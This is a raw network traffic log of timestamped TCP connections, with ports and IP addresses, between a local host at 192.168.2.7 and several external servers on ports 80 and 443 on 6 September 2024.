Sep 6, 2024 09:58:22.578960896 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:22.579041004 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.579138041 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:22.620589018 CEST	49723	80	192.168.2.7	185.215.113.100
Sep 6, 2024 09:58:22.624506950 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.662307024 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.662348986 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.662492037 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.662565947 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.662607908 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.662688971 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.662764072 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.662781000 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.662868023 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:22.662883997 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:22.664340019 CEST	443	49764	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:22.664444923 CEST	443	49764	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:22.664503098 CEST	49764	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:22.666425943 CEST	49764	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:22.666445017 CEST	443	49764	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:22.676968098 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:22.676992893 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.681759119 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.681772947 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.681792021 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.681799889 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.681847095 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:22.681859970 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.681874990 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.681893110 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:22.681925058 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:22.683454037 CEST	49767	443	192.168.2.7	152.195.19.97
Sep 6, 2024 09:58:22.683470011 CEST	443	49767	152.195.19.97	192.168.2.7
Sep 6, 2024 09:58:22.761893988 CEST	49772	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:22.761938095 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:22.762252092 CEST	49772	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:22.762547970 CEST	49772	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:22.762561083 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:22.942519903 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:22.943985939 CEST	49769	443	192.168.2.7	142.250.80.68
Sep 6, 2024 09:58:22.943996906 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:22.945247889 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:22.952337027 CEST	49769	443	192.168.2.7	142.250.80.68
Sep 6, 2024 09:58:22.953182936 CEST	49769	443	192.168.2.7	142.250.80.68
Sep 6, 2024 09:58:22.953255892 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:22.953382969 CEST	49769	443	192.168.2.7	142.250.80.68
Sep 6, 2024 09:58:22.996506929 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:23.057488918 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:23.057527065 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:23.057589054 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:23.057641029 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:23.057718039 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:23.063165903 CEST	49769	443	192.168.2.7	142.250.80.68
Sep 6, 2024 09:58:23.075707912 CEST	80	49768	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:23.076406956 CEST	49768	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:23.124557972 CEST	49768	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:23.129373074 CEST	80	49768	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:23.141532898 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.142215967 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.144886971 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.144908905 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.144992113 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.145008087 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.145153046 CEST	49769	443	192.168.2.7	142.250.80.68
Sep 6, 2024 09:58:23.145173073 CEST	443	49769	142.250.80.68	192.168.2.7
Sep 6, 2024 09:58:23.145391941 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.145452976 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.146181107 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.146204948 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.147154093 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.147183895 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.147212982 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.147222996 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.152416945 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.152417898 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.154462099 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.154612064 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.154751062 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.154947996 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.351120949 CEST	80	49768	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:23.353120089 CEST	49768	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:23.360508919 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.364496946 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:23.368032932 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.368037939 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:23.408003092 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:23.411082983 CEST	49772	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:23.413147926 CEST	49772	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:23.413167953 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:23.413418055 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:23.415534973 CEST	49772	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:23.447345972 CEST	49773	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.447397947 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.447531939 CEST	49774	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.447541952 CEST	443	49774	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.447566986 CEST	49773	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.447649002 CEST	49774	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.447817087 CEST	49773	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.447833061 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.447936058 CEST	49774	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.447949886 CEST	443	49774	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.456497908 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:23.482322931 CEST	49768	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:23.482630014 CEST	49775	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:23.487651110 CEST	80	49768	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:23.487848997 CEST	80	49775	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:23.491723061 CEST	49768	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:23.491765976 CEST	49775	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:23.492496967 CEST	49775	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:23.497243881 CEST	80	49775	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:23.683993101 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:23.684084892 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:23.690100908 CEST	49772	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:23.698167086 CEST	49772	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:23.698189020 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:23.698208094 CEST	49772	443	192.168.2.7	184.28.90.27
Sep 6, 2024 09:58:23.698215008 CEST	443	49772	184.28.90.27	192.168.2.7
Sep 6, 2024 09:58:23.897732019 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.899631023 CEST	49773	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.899660110 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.900029898 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.900664091 CEST	49773	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.900738955 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.900804043 CEST	49773	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.904382944 CEST	443	49774	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.904583931 CEST	49774	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.904596090 CEST	443	49774	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.904974937 CEST	443	49774	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.905247927 CEST	49774	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.905325890 CEST	443	49774	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.905344009 CEST	49774	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:23.948493004 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.948508978 CEST	443	49774	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:23.976536036 CEST	49773	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.009637117 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.009733915 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.009859085 CEST	49773	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.010060072 CEST	49773	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.010081053 CEST	443	49773	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.044997931 CEST	443	49774	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.045109987 CEST	49774	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.045418024 CEST	49774	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.045433998 CEST	443	49774	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.186252117 CEST	80	49775	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:24.190418005 CEST	49775	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:24.207622051 CEST	49775	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:24.212526083 CEST	80	49775	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:24.384941101 CEST	49780	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:24.384969950 CEST	443	49780	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:24.385205030 CEST	49780	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:24.385673046 CEST	49780	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:24.385679960 CEST	443	49780	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:24.420049906 CEST	49759	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.420123100 CEST	49760	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.420144081 CEST	443	49759	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.420172930 CEST	49780	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:24.420228958 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:24.420257092 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:24.420317888 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:24.420341015 CEST	443	49759	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.420412064 CEST	443	49760	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.420562983 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:24.420597076 CEST	443	49760	172.64.41.3	192.168.2.7
Sep 6, 2024 09:58:24.420691967 CEST	443	49771	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:24.420849085 CEST	443	49770	142.250.81.238	192.168.2.7
Sep 6, 2024 09:58:24.420989990 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:24.421019077 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:24.425497055 CEST	49759	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.425523043 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:24.425529003 CEST	49759	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.425573111 CEST	49760	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.425807953 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:24.425821066 CEST	49771	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:24.425834894 CEST	49760	443	192.168.2.7	172.64.41.3
Sep 6, 2024 09:58:24.425856113 CEST	49770	443	192.168.2.7	142.250.81.238
Sep 6, 2024 09:58:24.426160097 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:24.426440954 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:24.426451921 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:24.431849003 CEST	80	49775	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:24.431930065 CEST	49775	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:24.464504957 CEST	443	49780	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:24.602884054 CEST	49775	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:24.603202105 CEST	49784	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:24.608624935 CEST	80	49775	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:24.608787060 CEST	80	49784	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:24.609603882 CEST	49775	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:24.609648943 CEST	49784	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:24.611799955 CEST	49784	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:24.616626978 CEST	80	49784	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:24.758296967 CEST	49785	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:24.758352995 CEST	443	49785	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:24.769385099 CEST	49785	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:24.774715900 CEST	49785	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:24.774760008 CEST	443	49785	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:25.027452946 CEST	443	49780	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.027600050 CEST	443	49780	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.036499023 CEST	443	49780	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.042876959 CEST	49780	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.042901039 CEST	49780	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.042901039 CEST	49780	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.088813066 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.104581118 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.104595900 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.105755091 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.111947060 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.127361059 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.127510071 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.130064964 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.176493883 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.179160118 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.179172039 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.233843088 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.233859062 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.233875036 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.233882904 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.233891010 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.235198975 CEST	443	49785	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:25.235213041 CEST	443	49785	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:25.248811007 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.248835087 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.248843908 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.249207020 CEST	49785	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:25.249212027 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.304928064 CEST	80	49784	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:25.322417974 CEST	49784	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:25.323484898 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.323502064 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.323520899 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.323528051 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.323551893 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.323561907 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.324289083 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.324498892 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.325202942 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.325216055 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.325238943 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.325264931 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.327581882 CEST	49785	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:25.327594995 CEST	443	49785	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:25.327742100 CEST	49785	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:25.327896118 CEST	443	49785	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:25.330637932 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.330646038 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.331126928 CEST	49785	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:25.331134081 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.341960907 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:25.346664906 CEST	49784	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:25.346820116 CEST	80	49786	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:25.346971989 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:25.347114086 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:25.351407051 CEST	80	49784	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:25.352011919 CEST	80	49786	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:25.353905916 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.353950977 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.356163979 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.356558084 CEST	49787	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.356574059 CEST	443	49787	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.413511038 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.413526058 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.413561106 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.413590908 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.414879084 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.414891958 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.414915085 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.414940119 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.415308952 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.415338993 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.416291952 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.416311979 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.417197943 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.417227983 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.427009106 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.427153111 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.427170038 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.427285910 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.427319050 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.427427053 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.504443884 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.504472017 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.504560947 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.504589081 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.504719973 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.505083084 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.505105019 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.505918026 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.505953074 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.506552935 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.506567001 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.506619930 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.506789923 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.506916046 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.506936073 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.507677078 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.507705927 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.508045912 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.508047104 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.508061886 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.508086920 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.508163929 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.508220911 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.508229017 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.508260012 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.508524895 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.509040117 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.509058952 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.513674021 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.513686895 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.513765097 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.573569059 CEST	80	49784	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:25.581983089 CEST	49784	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:25.594805002 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.594835043 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.594978094 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.595014095 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.595277071 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.595295906 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.595505953 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.595535040 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.595647097 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.600111008 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.600557089 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.600662947 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.600723028 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.600754976 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.600867033 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.609138966 CEST	49783	443	192.168.2.7	13.107.246.40
Sep 6, 2024 09:58:25.609164000 CEST	443	49783	13.107.246.40	192.168.2.7
Sep 6, 2024 09:58:25.715025902 CEST	49784	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:25.715342045 CEST	49790	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:25.720082045 CEST	80	49784	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:25.720150948 CEST	49784	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:25.720216990 CEST	80	49790	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:25.720280886 CEST	49790	80	192.168.2.7	31.41.244.10
